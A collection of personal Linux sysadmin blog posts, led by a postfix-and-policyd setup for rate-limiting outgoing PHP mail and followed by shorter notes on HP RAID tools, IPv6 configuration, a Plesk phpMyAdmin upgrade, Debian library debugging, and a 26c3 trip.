Rate limit outgoing emails from PHP web applications using postfix and policyd

One of the worst things a webmaster, or anyone else who runs a web application, can do is to constantly send “informative newsletters” to people. Most CMS applications make it really easy to send such emails. These are 99% spam, and as such there are many good reasons to limit the amount of such outgoing “newsletters” coming out of your email server. Otherwise there’s a good chance you’ll get added to a blacklist, and you don’t want your legitimate clients to have their emails blocked because of a few irresponsible people. I recently had to deploy such a solution on a hosting server that serves multiple (>300) domains. The server already ran postfix, so I had to implement something useful around it.

The problem with postfix is that you can’t really rate-limit the outgoing queue per sender domain/address. There are only generic settings that control the mail server’s overall capability of sending emails. What I wanted though was the ability to restrict specific domains to a specific message count per day. This is something that a postfix addon named postfix-policyd can do by deferring/greylisting, but still only on the incoming queue. One would think that just applying this solves the problem, but the truth is that it doesn’t. Applying a defer/greylisting policy on the incoming queue is fine as long as the client on the remote side is another SMTP server that can happily keep the deferred email in its own queue and retry some minutes/hours later. What happens though if the SMTP client is a PHP application that sends through the mail() function? There you have no queue, and if you defer a message at the SMTP server it is lost forever, PHP can’t resend it. So the solution is to put an intermediate SMTP queue between PHP and the primary SMTP server, that is another local postfix installation that serves only as a queue relaying emails to the primary.

Using a “simple” diagram, sending an email from PHP should follow this path after a successful installation:

PHP mail() –(sendmail binary)–> intermediate_POSTFIX –(SMTP relay)–> POSTFIX –(smtpd_sender_restrictions)–> POLICYD –(pickup)–> POSTFIX –(SMTP)–> REMOTE SERVER

Here are the steps I took on a Debian Squeeze server to install this little monster.

1. Create a new postfix configuration directory for the new intermediate postfix instance
I named my intermediate postfix config dir postfix2525; the name comes from the port it will listen on, but you can definitely be more creative.

# mkdir /etc/postfix2525
# cp -av /etc/postfix/* /etc/postfix2525/

Remove everything from /etc/postfix2525/main.cf and just add the following lines:

data_directory = /var/lib/postfix2525
queue_directory = /var/spool/postfix2525
relayhost = 127.0.0.1:12525

This defines a new data and queue directory and instructs this postfix to relay all emails through another one listening on localhost, the primary one, on port 12525. More about this port later, when you create some special config on the primary postfix.

Remove previous contents of /etc/postfix2525/master.cf and just add these lines:

127.0.0.1:2525      inet  n       -       -       -       2       smtpd
        -o syslog_name=postfix2525
pickup    fifo  n       -       -       60      1       pickup
cleanup   unix  n       -       -       -       0       cleanup
qmgr      fifo  n       -       n       300     1       qmgr
#qmgr     fifo  n       -       -       300     1       oqmgr
tlsmgr    unix  -       -       -       1000?   1       tlsmgr
rewrite   unix  -       -       -       -       -       trivial-rewrite
bounce    unix  -       -       -       -       0       bounce
defer     unix  -       -       -       -       0       bounce
trace     unix  -       -       -       -       0       bounce
verify    unix  -       -       -       -       1       verify
flush     unix  n       -       -       1000?   0       flush
proxymap  unix  -       -       n       -       -       proxymap
proxywrite unix -       -       n       -       1       proxymap
smtp      unix  -       -       -       -       -       smtp
# When relaying mail as backup MX, disable fallback_relay to avoid MX loops
relay     unix  -       -       -       -       -       smtp
        -o smtp_fallback_relay=
#       -o smtp_helo_timeout=5 -o smtp_connect_timeout=5
showq     unix  n       -       -       -       -       showq
error     unix  -       -       -       -       -       error
retry     unix  -       -       -       -       -       error
discard   unix  -       -       -       -       -       discard
local     unix  -       n       n       -       -       local
virtual   unix  -       n       n       -       -       virtual
lmtp      unix  -       -       -       -       -       lmtp
anvil     unix  -       -       -       -       1       anvil
scache    unix  -       -       -       -       1       scache

Obviously the most important part here is the first line. It defines that this postfix instance will listen for SMTP connections on localhost, port 2525, and that its syslog name will be postfix2525, so it’s easier to tell apart which SMTP instance spits out which errors.

After this is done you need to run the following command that will create all necessary directories with their proper permissions.

# postfix -c /etc/postfix2525/ check

Also make sure you add the following line to the main.cf file of your main postfix installation:
alternate_config_directories = /etc/postfix2525

You will also need a new init script. Since the script by itself is quite big and there are only a few lines that actually differ, I will post my diff here:

--- /etc/init.d/postfix  2011-05-04 21:17:47.000000000 +0200
+++ /etc/init.d/postfix2525  2011-12-19 19:22:09.000000000 +0100
@@ -17,8 +17,10 @@
 # Description:       postfix is a Mail Transport agent
 ### END INIT INFO
 
+CONFDIR=/etc/postfix2525
 PATH=/bin:/usr/bin:/sbin:/usr/sbin
 DAEMON=/usr/sbin/postfix
+DAEMON_OPTIONS="-c /etc/postfix2525"
 NAME=Postfix
 TZ=
 unset TZ
@@ -28,13 +30,13 @@
 
 test -f /etc/default/postfix && . /etc/default/postfix
 
-test -x $DAEMON && test -f /etc/postfix/main.cf || exit 0
+test -x $DAEMON && test -f /etc/postfix2525/main.cf || exit 0
 
 . /lib/lsb/init-functions
 #DISTRO=$(lsb_release -is 2>/dev/null || echo Debian)
 
 running() {
-    queue=$(postconf -h queue_directory 2>/dev/null || echo /var/spool/postfix)
+    queue=$(postconf -c $CONFDIR -h queue_directory 2>/dev/null || echo /var/spool/postfix2525)
     if [ -f ${queue}/pid/master.pid ]; then
   pid=$(sed 's/ //g' ${queue}/pid/master.pid)
   # what directory does the executable live in.  stupid prelink systems.
@@ -66,7 +68,7 @@
       fi
 
       # see if anything is running chrooted.
-      NEED_CHROOT=$(awk '/^[0-9a-z]/ && ($5 ~ "[-yY]") { print "y"; exit}' /etc/postfix/master.cf)
+      NEED_CHROOT=$(awk '/^[0-9a-z]/ && ($5 ~ "[-yY]") { print "y"; exit}' /etc/postfix2525/master.cf)
 
       if [ -n "$NEED_CHROOT" ] && [ -n "$SYNC_CHROOT" ]; then
     # Make sure that the chroot environment is set up correctly.
@@ -111,7 +113,7 @@
     umask $oldumask
       fi
 
-      if start-stop-daemon --start --exec ${DAEMON} -- quiet-quick-start; then
+      if start-stop-daemon --start --exec ${DAEMON} -- ${DAEMON_OPTIONS} quiet-quick-start; then
     log_end_msg 0
       else
     log_end_msg 1
@@ -123,7 +125,7 @@
   RUNNING=$(running)
   log_daemon_msg "Stopping Postfix Mail Transport Agent" postfix
   if [ -n "$RUNNING" ]; then
-      if ${DAEMON} quiet-stop; then
+      if ${DAEMON} ${DAEMON_OPTIONS} quiet-stop; then
     log_end_msg 0
       else
     log_end_msg 1

If everything went well up to now you should be able to start your new postfix instance and check that it is actually running.

# /etc/init.d/postfix2525 start
# netstat -antp | grep 2525
tcp        0      0 127.0.0.1:2525          0.0.0.0:*               LISTEN      6138/master
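If you were also watching syslog you should see the new instance starting up. Thanks to the syslog_name override you can filter its log lines easily, with something like this (assuming Debian’s default mail log location):

# grep postfix2525 /var/log/mail.log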

2. Configure main postfix to accept emails from the intermediate
Edit /etc/postfix/master.cf and add this line at the bottom:

127.0.0.1:12525 inet n - - - - smtpd
        -o smtp_fallback_relay=
        -o smtpd_client_restrictions=
        -o smtpd_helo_restrictions=
        -o smtpd_recipient_restrictions=permit_mynetworks,reject
        -o smtpd_data_restrictions=
        -o receive_override_options=no_unknown_recipient_checks

This defines a special listening port on the main postfix instance with its own (rather relaxed) set of restrictions.
You will have to change this line later on, after installing postfix-policyd, but it is good enough for now so that you can do some testing.
Restart postfix

# /etc/init.d/postfix restart
# netstat -antp | grep 2525
tcp        0      0 127.0.0.1:12525         0.0.0.0:*               LISTEN      26799/master    
tcp        0      0 127.0.0.1:2525          0.0.0.0:*               LISTEN      6138/master   

The intermediate postfix listens on 127.0.0.1:2525 and the main one has another special listening port on 127.0.0.1:12525.

3. Test your intermediate postfix instance
You can do this in a gazillion different ways. One of my favorite ways to test SMTP connectivity is through telnet (---> marks data I typed):

# telnet localhost 2525
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 server.mydomain.gr ESMTP Postfix
---> EHLO koko.gr
250-server.mydomain.gr
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
---> MAIL FROM: lala@koko.gr
250 2.1.0 Ok
---> RCPT TO: koko@destination.gr
250 2.1.5 Ok
---> DATA
354 End data with <CR><LF>.<CR><LF>
---> THIS IS A TEST
---> .
250 2.0.0 Ok: queued as C41E21C84FF
---> quit

If you were keeping an eye on syslog messages you should have seen some connection messages both from postfix2525 and from postfix. If everything went well your email _should_ have arrived at its destination. If this is true then your primary postfix instance now works as a relay for your intermediate queue.

Don’t read the next parts of this post if you haven’t previously managed this step!

4. Install and configure postfix-policyd

# aptitude install postfix-policyd

To run policyd you need to create a database and import the policyd SQL schema into it. Your distro has probably already taken care of this step; if it hasn’t…do it manually and think about changing distro!
Then edit the config file usually located at /etc/postfix-policyd.conf. The options I chose to play with were the following:
SENDERTHROTTLE=1
SENDER_THROTTLE_SASL=1
SENDER_THROTTLE_HOST=0

Since all emails will be relayed through localhost there’s no point in throttling per host, what is needed is throttling per envelope sender.
You should manually review your desired limits though. I won’t post mine here because everyone has different needs and there’s no sane config for everyone.

Start postfix-policyd
# /etc/init.d/postfix-policyd start

If you get weird startup errors like:
postfix-policyd: fatal: didn't find priority 'LOG_IFOO', exiting
Edit /etc/postfix-policyd.conf, find the following line:
SYSLOG_FACILITY="LOG_MAIL | LOG_INFO"
and change it to (mind the removed spaces):
SYSLOG_FACILITY="LOG_MAIL|LOG_INFO"

5. Configure the main postfix instance to use postfix-policyd
Edit /etc/postfix/main.cf and add this:
webclient_restrictions = check_policy_service inet:127.0.0.1:10031

Then edit /etc/postfix/master.cf again and change the line you had previously added to the bottom of the file with this:

127.0.0.1:12525 inet n - - - - smtpd
        -o smtp_fallback_relay=
        -o smtpd_client_restrictions=
        -o smtpd_helo_restrictions=
        -o smtpd_recipient_restrictions=permit_mynetworks,reject
        -o smtpd_data_restrictions=
        -o receive_override_options=no_unknown_recipient_checks
        -o smtpd_sender_restrictions=${webclient_restrictions}

The difference is
-o smtpd_sender_restrictions=${webclient_restrictions}
which practically instructs postfix to use postfix-policyd for emails that arrive on port 12525, which is the port that the intermediate postfix instance uses to relay all emails.

6. Test your intermediate postfix instance again
If everything went well, the main postfix instance should now be able to enforce sender policies. Try sending a new email through the intermediate postfix again, yes using telnet, and you should pick up some new log lines in your syslog:

Dec 19 21:56:40 myserver postfix-policyd: connection from: 127.0.0.1 port: 45635 slots: 0 of 4096 used
Dec 19 21:56:40 myserver postfix-policyd: rcpt=5, greylist=new, host=127.0.0.1 (unknown), from=lala@koko.gr, to=koko@lalala.gr, size=348
Dec 19 21:56:40 myserver postfix/smtpd[9168]: NOQUEUE: reject: RCPT from unknown[127.0.0.1]: 450 4.7.1 : Sender address rejected: Policy Rejection- Please try later.; from= to= proto=ESMTP helo=
Dec 19 21:56:40 myserver postfix/smtp[8970]: C41E21C84FF: to=, relay=127.0.0.1[127.0.0.1]:12525, delay=20, delays=20/0/0.01/0, dsn=4.7.1, status=deferred (host 127.0.0.1[127.0.0.1] said: 450 4.7.1 : Sender address rejected: Policy Rejection- Please try later. (in reply to RCPT TO command))

The above means that greylisting through policyd works.
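While testing, a quick way to watch only policyd’s decisions is to follow the mail log and filter on its syslog tag (again assuming Debian’s default mail log location):

# tail -f /var/log/mail.log | grep postfix-policyd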

7. Make PHP use your new intermediate postfix instance
PHP on linux by default uses the sendmail binary to send emails via the mail() function. That would use the main postfix instance though, so one needs to edit /etc/php/apache2/php.ini and change the following line:
sendmail_path = "sendmail -C /etc/postfix2525 -t -i"

The -C directive instructs sendmail to use the alternate config dir, so that emails will be sent to the new intermediate postfix instance and then to the main one, passing through policyd of course.
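If you want to test the exact path PHP will follow without writing any PHP code, you can pipe a message through the very same sendmail invocation (the address below is obviously a placeholder):

# printf 'To: someone@example.com\nSubject: test via postfix2525\n\ntest body\n' | sendmail -C /etc/postfix2525 -t -i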

To check the queue size of the intermediate postfix:
# postqueue -p -c /etc/postfix2525/

If any hosted PHP applications have explicit SMTP server/port settings, be sure to notify your clients/developers that they _MUST_ send their emails through localhost:2525 and not the default localhost:25. This is one of the shortcomings of the above method: if someone manually sets up his application to use the default localhost:25, his emails will go right through. But being a good sysadmin, you should monitor such behavior and punish those users accordingly!

That’s about it…with the above configuration and some tweaking of the thresholds you have very good chances of avoiding getting blacklisted because someone decided to send a few thousand spam emails. And most importantly, your normal mail service will continue to work flawlessly, no matter how big the queue of the intermediate mail server is.

Enjoy!

Reference for policyd: http://policyd.sourceforge.net/readme.html

Handling right clicks on a macbook running Linux – The 2011 Awesome Edition

2 years ago I had written a post about handling right clicks on a macbook running linux. Along with changing my window manager of choice, I think I’ve found a better/more elegant solution to that problem.

On my computer’s workspaces one will normally find one or two browser windows open, some instant messaging applications (skype,pidgin), an mp3 player (audacious2) and terminals. Lots of them. I need them to ssh to the servers I monitor/administer and for coding (with vim of course!). I even use one for my email client (mutt). So I need my terminals to be as efficient as possible. After many trials over the years I’ve decided on using urxvt as my terminal of choice.

About a month ago I gave awesome a try and since then it’s been my window manager of choice instead of fluxbox. The reason behind this is mostly fluxbox’s inability to tile terminal (read: urxvt) windows efficiently while changing resolutions. I mostly use my laptop with an external 23” monitor, but I wanted to be able to tile my terminals regardless of whether I was using only my laptop’s screen or both the laptop’s and the external one. In fluxbox you can make a window appear on a specific area of the screen, so I could open 3-4 terminals on a specific workspace/monitor. Resizing one of them to fit some monitoring program more efficiently didn’t resize the others ‘automagically’ though, so I had to manually resize all open windows of that workspace. Yes, this is horrible from a usability point of view; luckily I didn’t have to do it that frequently. So I gave awesome a try for its tiling features. I really miss fluxbox’s tabbing features, which I constantly used along with its amazing keybinding flexibility (rant: isn’t it stupid that you have to write your keybindings in lua for awesome and in haskell for xmonad?), but the tiling capabilities of awesome are currently more important to me.

So while my previous solution for right clicking without a mouse worked pretty well for fluxbox, in my new awesome world I’ve replaced it with the xautomation tools. First of all, one needs to install them:

aptitude install xautomation
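If you want to verify that xte does what you expect before touching rc.lua, you can fire a right click from a terminal; the sleep just gives you a couple of seconds to move the pointer over some window:

sleep 2; xte 'mouseclick 3'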

Then find the clientbuttons configuration part in the default ~/.config/awesome/rc.lua and add this line to it:

awful.button({ modkey }, 2, function () awful.util.spawn("xte 'mouseclick 3'") end)

Restart awesome and try modkey + a 3-finger tap on your touchpad. You should see a right click “menu”.
If you don’t know what a 3-finger tap is or how to configure it, read the 2009 article.

That’s it, no more xbindkeys + xvkbd for awesome.

Notes on HP raid controllers

Lately I had to deal with some HP raid controllers and I’ve gathered some notes on them. I’ll post them here so I won’t forget about them.

First of all, don’t even think of using them without a battery pack. Seriously, DON’T. The performance degradation is humongous; without a battery pack the controllers were giving me 1/20th of the results they gave with one. If you want to quickly test them, try iozone using the following options: iozone -t4 -I

Installing hpacucli is also a must if you want to monitor or configure the controllers from within your OS. Be sure to add the repositories from HWraid to your system and then issue: aptitude install hpacucli (you are using Debian, aren’t you?). That reminds me that I am using those repositories on so many systems I manage that I must send a donation to the people at HWraid to thank them.

Below are some commands using hpacucli that I used.
# Show everything about your raid controllers
# hpacucli controller all show config detail

Cache Board Present: True
Cache Status: OK
Accelerator Ratio: 25% Read / 75% Write
Drive Write Cache: Enabled
Total Cache Size: 512 MB
Battery Pack Count: 1
Battery Status: OK
SATA NCQ Supported: True

What you must take notice of here are the Accelerator Ratio, Drive Write Cache and Battery Pack Count values.
If you have a battery pack installed but your Drive Write Cache is still shown as “Disabled”, you can enable it using the command:
# hpacucli controller slot=X modify dwc=enable
You’ll know what to put instead of “slot=X” from the output of the previous command (show config detail).

To modify Accelerator Ratio (read/write):
# hpacucli controller slot=X modify cacheratio=25/75

To enable Array Acceleration for one of your logical drives use:
# hpacucli controller slot=X logicaldrive Y modify aa=enable
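If you want to keep an eye on the battery and cache status from a cron job or a monitoring script, a quick and dirty check based on the fields shown above could be something like:

# hpacucli controller all show config detail | egrep 'Battery Status|Cache Status|Drive Write Cache'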

If you happen to face the following error while opening hpacucli, don’t worry. You don’t need to reboot your machine as I’ve seen in various blogs.

Error: Another instance of ACU is already running (possibly a service). Please
terminate the ACU application before running the ACU CLI. Press ENTER to
exit.

What you need to do is delete the stale IPC semaphore that hpacucli left behind when it got killed for some reason.
To see all your ipcs:

# ipcs
------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status      

------ Semaphore Arrays --------
key        semid      owner      perms      nsems     
0xffffffff 32768      root       0          1         

------ Message Queues --------
key        msqid      owner      perms      used-bytes   messages    

Then use ipcrm to remove the array with the semid you want:
# ipcrm -s 32768

and try to start hpacucli again.

References:
1. http://www.datadisk.co.uk/html_docs/redhat/hpacucli.htm
2. http://people.freebsd.org/~jcagle/hpacucli-readme

void.gr on native IPv6

Some months ago (exactly 4 actually) I had posted that void.gr was then accessible over IPv6. Today void.gr is accessible over native IPv6 thanks to my hosting provider, Leaseweb.

About a year ago I had asked Leaseweb for IPv6 support and their reply wasn’t very promising. It seemed that they weren’t really looking forward to providing IPv6 for their dedicated server clients yet. Today though I thought I should ask again, even if IPv6 support for their dedicated servers is still not referenced anywhere. And I got lucky! They offered me a /64.

So void.gr is from now on accessible over IPv6 at 2001:1af8:4100:a000:4::131.

Accessing my server over IPv6 from my home’s native IPv6 connection, thanks to OTE providing beta IPv6 access to subscribers, seems a bit faster than accessing it via IPv4. Ping times are usually 4-5ms better. Looks like IPv6 connections are not that crowded as IPv4 are 🙂

The setup is pretty straightforward. Even if the Debian wiki is not very clear about how to set up IPv6, here’s what you have to do if you, like me, have a server with a native IPv6 connection.

# vi /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 85.17.162.131
    netmask 255.255.255.0
    gateway 85.17.162.254
    network 85.17.162.0
    broadcast 85.17.162.255
iface eth0 inet6 static
    address 2001:1af8:4100:a000:4::131
    netmask 64
    gateway 2001:1AF8:4100:A000::1
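After bringing eth0 up again you can quickly verify that the address and the default route are there and that the gateway from the config above answers:

# ip -6 addr show dev eth0
# ip -6 route show
# ping6 -c 3 2001:1AF8:4100:A000::1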

Then of course you need to edit your Apache configuration to add the IPv6 vhosts.

P.S. I am still waiting for an answer as to whether I can manage the reverse delegation of the IPv6 address space Leaseweb gave me, since I can’t do that from the control panel. I’ll post any updates on the ticket when I have some news…

Upgrading Plesk’s phpMyAdmin to the latest version

phpMyAdmin is a great tool but a constant headache (XSS, SQL injections, etc) as well. Every now and then new security holes are discovered that need to be fixed ASAP. On the other hand, Plesk doesn’t seem to follow these security fixes, so if you want to keep yourself a bit more secure than Plesk thinks you should be, you have to upgrade phpMyAdmin by yourself. This procedure isn’t very straightforward due to the way Plesk uses PMA, so I’ll post some notes/guidelines here on how to achieve that.

My notes are based on Plesk 8.6, so I am sure newer Plesk versions are way easier to upgrade than this.

Step 1: Download new phpMyAdmin
# wget http://downloads.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.3.8/phpMyAdmin-3.3.8-all-languages.tar.gz
Step 2: Extract into /opt/psa/admin/htdocs/domains/databases/

# mv phpMyAdmin-3.3.8-all-languages.tar.gz /opt/psa/admin/htdocs/domains/databases/
# cd /opt/psa/admin/htdocs/domains/databases/
# tar zxf phpMyAdmin-3.3.8-all-languages.tar.gz

Step 3: Rename old PMA and symlink the new
# mv phpMyAdmin phpMyAdmin.old
# ln -sf phpMyAdmin-3.3.8-all-languages phpMyAdmin

Step 4: Copy old config file
This step depends on your old PMA version. Since my version was 2.8.2.4 I had to:
# cp phpMyAdmin.old/libraries/config.default.php phpMyAdmin/config.inc.php
If you have newer versions of PMA just do:
# cp phpMyAdmin.old/config.inc.php phpMyAdmin/config.inc.php
Step 5: Edit necessary files
Substep a: edit phpMyAdmin/libraries/session.inc.php
When the first comment block finishes and before line 14: if (! defined('PHPMYADMIN')) {
add the following snippet:
// Close Plesk's session.
$proxy_session_id = session_id();
@session_write_close();
unset($_SESSION);

Substep b: edit phpMyAdmin/libraries/common.inc.php around line 190 and change:
    'error_handler',
    'PMA_PHP_SELF',
    'variables_whitelist',
    'key'
);

to
    'error_handler',
    'PMA_PHP_SELF',
    'variables_whitelist',
    'key',
    // from Plesk
    'PHP_SELF',
    'db_host',
    'db_port',
    'db_user',
    'db_pass',
    'db_name'
);

!! Mind the “,” after ‘key’ !!

That’s about it…you should now be able to use your new PMA version through Plesk.

void.gr on IPv6

Since Leaseweb, the hosting company where void.gr’s server is located, isn’t yet ready to provide native IPv6 to dedicated servers, I decided not to wait for them any longer and to set up an IPv6 tunnel to tunnelbroker.net, so as to make void.gr accessible over IPv6.

Setting up the tunnel is extremely easy. Having the following in my /etc/rc.conf does the trick:

ip tunnel add he-ipv6 mode sit remote 216.66.84.46 local 85.17.162.131 ttl 255
ip link set he-ipv6 up
ip addr add 2001:470:1f14:e0a::2/64 dev he-ipv6
ip route add ::/0 dev he-ipv6
ip addr add 2001:470:1f15:e0a::1/64 dev eth2
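To check that the tunnel actually came up, look at the routes and ping something over IPv6 (ipv6.he.net from the link below is as good a target as any):

ip -6 route show
ping6 -c 3 ipv6.he.net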

Yes, I know I could have used some of Debian’s config files for these parameters…Oh, and you “ifconfig” users, it’s time to give up that ancient tool and learn how to use “ip”.

So for you people who have IPv6 connectivity, just try it. The current IP of void.gr is 2001:470:1f15:e0a::1. Ping6 it 🙂

Time is ticking away…bye bye IPv4: http://ipv6.he.net/statistics/

Investigating SIGABRT problems on Debian

3 days ago, after a Debian (squeeze/sid) upgrade on my laptop, some programs stopped opening. Specifically, pidgin and google-chrome were crashing when I tried to open them. When I started them from a terminal the output was this:

kargig@laptop:~%pidgin
[1]    3853 abort      pidgin
kargig@laptop:~%google-chrome
[1]    3882 abort      google-chrome

The first thing I checked was the list of updated packages, to see whether one of them was the culprit.
The upgraded packages included among others:

[UPGRADE] libk5crypto3 1.8.3+dfsg-1 -> 1.8.3+dfsg-2
[UPGRADE] libkrb5-3 1.8.3+dfsg-1 -> 1.8.3+dfsg-2
[UPGRADE] libkrb5support0 1.8.3+dfsg-1 -> 1.8.3+dfsg-2
[UPGRADE] libnspr4-0d 4.8.4-2 -> 4.8.6-1
[UPGRADE] libnss3-1d 3.12.6-3 -> 3.12.8-1
[UPGRADE] linux-base 2.6.32-23 -> 2.6.32-25
[UPGRADE] linux-headers-2.6.32-5-686-bigmem 2.6.32-23 -> 2.6.32-25
[UPGRADE] linux-headers-2.6.32-5-common 2.6.32-23 -> 2.6.32-25
[UPGRADE] linux-image-2.6.32-5-686-bigmem 2.6.32-23 -> 2.6.32-25
[UPGRADE] linux-libc-dev 2.6.32-23 -> 2.6.32-25
[UPGRADE] xserver-xorg-video-intel 2:2.9.1-4 -> 2:2.12.0+shadow-2

My first suspect was the xserver-xorg-video-intel package. I started searching the Debian bug tracking system for reports of crashes with abort. Nothing. Then I checked the other “suspicious” packages for abort crash reports on the bug tracker…still nothing.
It was time for strace.

kargig@laptop:~%strace pidgin
...
[snip]
...
open("/usr/lib/nss/libfreebl3.so", O_RDONLY) = 14
read(14, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\30\0\0004\0\0\0"..., 512) = 512
fstat64(14, {st_mode=S_IFREG|0644, st_size=253328, ...}) = 0
mmap2(NULL, 268988, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 14, 0) = 0xb58e3000
mmap2(0xb5920000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 14, 0x3d) = 0xb5920000
mmap2(0xb5921000, 15036, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb5921000
close(14)                               = 0
open("/etc/ld.so.cache", O_RDONLY)      = 14
fstat64(14, {st_mode=S_IFREG|0644, st_size=79200, ...}) = 0
mmap2(NULL, 79200, PROT_READ, MAP_PRIVATE, 14, 0) = 0xb5ab7000
close(14)                               = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/usr/lib/swiftfox/libnspr4.so", O_RDONLY) = 14
read(14, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0P\227\0\0004\0\0\0"..., 512) = 512
fstat64(14, {st_mode=S_IFREG|0755, st_size=251136, ...}) = 0
close(14)                               = 0
munmap(0xb5ab7000, 79200)               = 0
rt_sigprocmask(SIG_UNBLOCK, [ABRT], NULL, 8) = 0
tgkill(4027, 4027, SIGABRT)             = 0
--- SIGABRT (Aborted) @ 0 (0) ---
+++ killed by SIGABRT +++
[1]    4026 abort      strace pidgin

What immediately caught my eye was this line inside the output:
open("/usr/lib/swiftfox/libnspr4.so", O_RDONLY) = 14
I have a 3rd party package called swiftfox installed, but why was pidgin trying to use this package’s library instead of the system one?

# ldconfig -p | grep nspr4
  libnspr4.so.0d (libc6) => /usr/lib/libnspr4.so.0d
  libnspr4.so (libc6) => /usr/lib/swiftfox/libnspr4.so
  libnspr4.so (libc6) => /usr/lib/libnspr4.so

So the system package libnspr4-0d has installed its files in /usr/lib/libnspr4.so.0d and has also placed a symlink from /usr/lib/libnspr4.so to /usr/lib/libnspr4.so.0d. For some reason though the /usr/lib/swiftfox/libnspr4.so appears before /usr/lib/libnspr4.so in the cache output for the libnspr4.so library.
Checking the /etc/ld.so.conf.d/ directory, there was a moz.conf file containing the path “/usr/lib/swiftfox/”.
An “ldconfig -v” confirmed the finding:

/usr/local/lib:
/usr/lib/swiftfox:
        libnssckbi.so -> libnssckbi.so
        libssl3.so -> libssl3.so
        libsqlite3.so -> libsqlite3.so
        libnssutil3.so -> libnssutil3.so
        libnss3.so -> libnss3.so
        libnspr4.so -> libnspr4.so
        libsmime3.so -> libsmime3.so
        libmozjs.so -> libmozjs.so
        libsoftokn3.so -> libsoftokn3.so
        libplc4.so -> libplc4.so
        libxul.so -> libxul.so
        libplds4.so -> libplds4.so
        libxpcom.so -> libxpcom.so
        libnssdbm3.so -> libnssdbm3.so
        libfreebl3.so -> libfreebl3.so
/lib:
        libnss_compat.so.2 -> libnss_compat-2.11.2.so
        libselinux.so.1 -> libselinux.so.1
...
[snip]
...

Moving /usr/lib/swiftfox/libnspr4.so to some other location allowed applications like pidgin and google-chrome to start normally (and swiftfox still runs properly).
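For the record, the “fix” was something along these lines; the destination is arbitrary, anything outside the directories listed in /etc/ld.so.conf.d/ will do:

# mv /usr/lib/swiftfox/libnspr4.so /root/libnspr4.so.swiftfox
# ldconfig
# ldconfig -p | grep nspr4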

I guess that was my punishment for using 3rd party packages on Debian…

*UPDATE 23/11/2010*
Google chrome was crashing with SIGABRT on some https:// sites. After further investigation I had to delete /usr/lib/swiftfox/libnssutil3.so as well.

Debian adventures

This post is a rant. So don’t complain, I warned you.

<rant>
On my laptop (Macbook 4,1) I run Debian testing/experimental, which had been running quite smoothly since I installed it, apart from the last couple of weeks.

The first problem I faced was java not running inside browsers. Firefox, Iceweasel, Opera, google-chrome…nothing. I spent at least 2 hours installing/uninstalling various java packages, moving plugins to new locations and I couldn’t get it to work. I was furiously googling about the issue until I hit the jackpot: squeeze : in case you have no network connection with java apps …

Today I upgraded xserver-xorg-input-synaptics from 1.2.0-2 to 1.2.1-1. Even though it is a minor version bump, a kind fairy also told me to reboot…I rebooted and my touchpad was not working properly: tapping was lost, I couldn’t use synclient because shared memory config (SHM) was not activated, and so on and so on. My dynamic config using hal was there, /var/log/Xorg.0.log said that I was using the proper device and lshal showed correct settings for the device. I read /usr/share/doc/xserver-xorg-input-synaptics/NEWS.Debian.gz: nothing new. After some googling, another jackpot: Bug#564211: xserver-xorg-input-synaptics: Lost tapping after upgrading to 1.2.1-1. For some reason the touchpad config has moved from hal to udev, and the maintainers didn’t think it was important enough to document someplace or put in README.Debian…

The last issue I am having is with linux-image-2.6.32-trunk-686-bigmem not working correctly with KMS and failing with DRM.
[ 0.967942] [drm] set up 15M of stolen space
[ 0.968030] nommu_map_sg: overflow 13d800000+4096 of device mask ffffffff
[ 0.968085] [drm:drm_agp_bind_pages] *ERROR* Failed to bind AGP memory: -12
[ 0.968159] [drm:i915_driver_load] *ERROR* failed to init modeset
[ 0.973067] i915: probe of 0000:00:02.0 failed with error -28

linux-image-2.6.32-trunk-686 works fine with those though.
[ 0.973466] [drm] set up 15M of stolen space
[ 1.907642] [drm] TV-16: set mode NTSC 480i 0
[ 2.137173] [drm] LVDS-8: set mode 1280x800 1f
[ 2.193497] Console: switching to colour frame buffer device 160x50
[ 2.197435] fb0: inteldrmfb frame buffer device
[ 2.197436] registered panic notifier
[ 2.197442] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0

Xorg is amazingly sluggish using the linux-image-2.6.32-trunk-686-bigmem kernel. I searched the Debian bug database and no one seems to have reported such an issue. But google came up with: [G35/KMS] DRM failure during boot (linux 2.6.31->2.6.32 regression). The issue looks solved there, so I will try to report it to Debian and see what comes out of it…
*Update* Bug Report: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=567352

If you dare to comment saying “that’s what you get for using experimental”, I curse you to spend 3 hours today trying to figure out what has changed in a minor version upgrade of one of your installed packages.
Even worse, if you are one of those guys that kept telling me “don’t use stable, testing is stable as a rock, never had a problem in years…”, then I curse you to spend a whole day trying to reconfigure something with no documentation 😛
</rant>

26c3: Here Be Dragons!

Patroklos (argp of census-labs.com) and I have been talking about going to a CCC event for years. This year though we were determined, so in late September 2009 we booked our flight tickets to Berlin. A couple of weeks later some other friends expressed their wish to come with us. So in the end me, Patroklos, huku, SolidSNK (of grhack.net) and Christine formed a group to visit 26c3 Here Be Dragons. Another group of Greeks also came to 26c3, among them Ithilgore, xorl, sin, gorlist and one more whose name I don’t know, sorry 🙂

After a canceled flight on the 26th of December due to fog at SKG airport, we finally flew to Berlin on the 27th. After arriving we immediately went to the hotel we had booked and then straight to the Berliner Congress Center where 26c3 was taking place.

BCC is an excellent conference center, nothing close to anything I have ever seen in Greece. It looks great both from the outside and from the inside. When we entered BCC we saw a huge number of diverse people. You could see and feel the difference from all the other IT conferences. People were very relaxed, very talkative and extremely friendly. What makes CCC so special is its community. There were soooo many CCC volunteers inside the BCC willing to help you with any information you might need. More on that later on…

